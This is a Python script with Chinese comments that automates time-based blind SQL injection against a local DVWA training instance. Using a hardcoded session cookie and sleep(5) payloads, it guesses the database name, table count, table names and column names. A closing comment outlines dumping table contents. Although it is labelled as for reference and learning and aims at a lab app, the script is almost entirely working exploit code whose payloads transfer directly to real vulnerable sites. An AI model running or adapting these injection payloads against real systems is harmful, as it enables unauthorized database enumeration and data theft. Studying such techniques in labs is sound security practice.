#仅供SQL时间盲注代码参考学习
#python dvwa时间盲注自动化脚本(poc-->exp)
import requests
import string
import time
INIT_URL="http://127.0.0.1/DVWA-master/DVWA-master/vulnerabilities/sqli_blind/index.php?id="
token={"security":"low","PHPSESSID":"p7g937ga5glcvg8m5hv9o9a2ht"} #登录身份识别
COLUMN_NUM=11
COLUMN_LEN=15
dbLen=0
dbname=''
table_num=0
table=[]
table_name='' #暂存用
column=[]
column_name=''#暂存用
rightLen=0
def timeOut(url):
try:
res=requests.get(url,timeout=3,cookies=token)
return res
except Exception as e:
return "timeout"
time_start=time.time()
#1.猜解数据库名长度 poc:" 1'and if(length(database())=4,sleep(5),1)=0#"
while True:
dbLen +=1
dbUrl=INIT_URL+"1'and if(length(database())="+str(dbLen)+",sleep(5),1)=0"+"%23&Submit=Submit#"
print(dbUrl)
if "timeout" in timeOut(dbUrl):
break
if dbLen==20:
print("not find dblen")
dbLen=0
break
print("dblen=",dbLen)
#2.猜解数据库名字 poc:" 1'and if(mid(database(),1,1))='a',sleep(5),1)=0#"
for i in range(1,dbLen+1):
for j in string.ascii_lowercase:
dbUrl=INIT_URL+"1'and if((mid(database(),"+str(i)+",1))='"+j+"',sleep(5),1)=0%23&Submit=Submit#"
print(dbUrl)
if "timeout" in timeOut(dbUrl):
print(j)
dbname+=j
break
print("数据库名字:"+dbname)
#3.猜解数据库表数量 poc:" 1'and if((select count(table_name) from information_schema.tables where table_schema='dvwa')=1,sleep(5),1)=0#"
for i in range(1,100):
dbUrl=INIT_URL+"1'and if((select count(table_name) from information_schema.tables where table_schema='"+dbname+"')="+str(i)+",sleep(5),1)=0%23&Submit=Submit#"
print(dbUrl)
if "timeout" in timeOut(dbUrl):
table_num=i
break
print(table_num)
#4.猜解表名 poc:" 1'and if((ascii(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 0,1),1,1)))=103,sleep(5),1)=0##
for i in range(table_num):
for k in range(COLUMN_LEN):
for j in range(48,123):
dbUrl=INIT_URL+"1'and if((ascii(substr((select table_name from information_schema.tables where table_schema='"+dbname+"' limit "+str(i)+",1),"+str(k)+",1)))="+str(j)+",sleep(5),1)=0%23&Submit=Submit#"
print(dbUrl)
if "timeout" in timeOut(dbUrl):
table_name+=chr(j)
print(table_name)
break
table.append(table_name)
table_name=''
print("表名:"+str(table))
#5.猜解列名 poc :" 1'and if((ascii(substr((select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 0,1),1,1)))=i,sleep(5),1)=0#
for m in range(table_num):
for i in range(COLUMN_NUM):
for k in range(COLUMN_LEN):
for j in range(48,123):
dbUrl=INIT_URL+"1'and if((ascii(substr((select column_name from information_schema.columns where table_schema='"+dbname+"'and table_name='"+table[m]+"' limit "+str(i)+",1),"+str(k)+",1)))="+str(j)+",sleep(5),1)=0%23&Submit=Submit#"
print(dbUrl)
if "timeout" in timeOut(dbUrl):
column_name+=chr(j)
print(column_name)
break
column_name+='/'
column.append(column_name)
column_name=''
print("列名:"+str(column))
time_end=time.time()
print('用时:',time_end-time_start,'s')
print("正常返回文本长度:"+str(rightLen))
print("数据库长度:"+str(dbLen))
print("数据库名字:"+dbname)
print("表数量"+str(i))
print("表名:"+str(table))
print("列名:"+str(column))
#6.拖库 poc: 1'and if((select ascii(substr((select column[i] from dbname.table[j] limit 0,1),1,1)))=i,sleep(5),1)=0#
#具体列具体猜解,全部猜解时间太高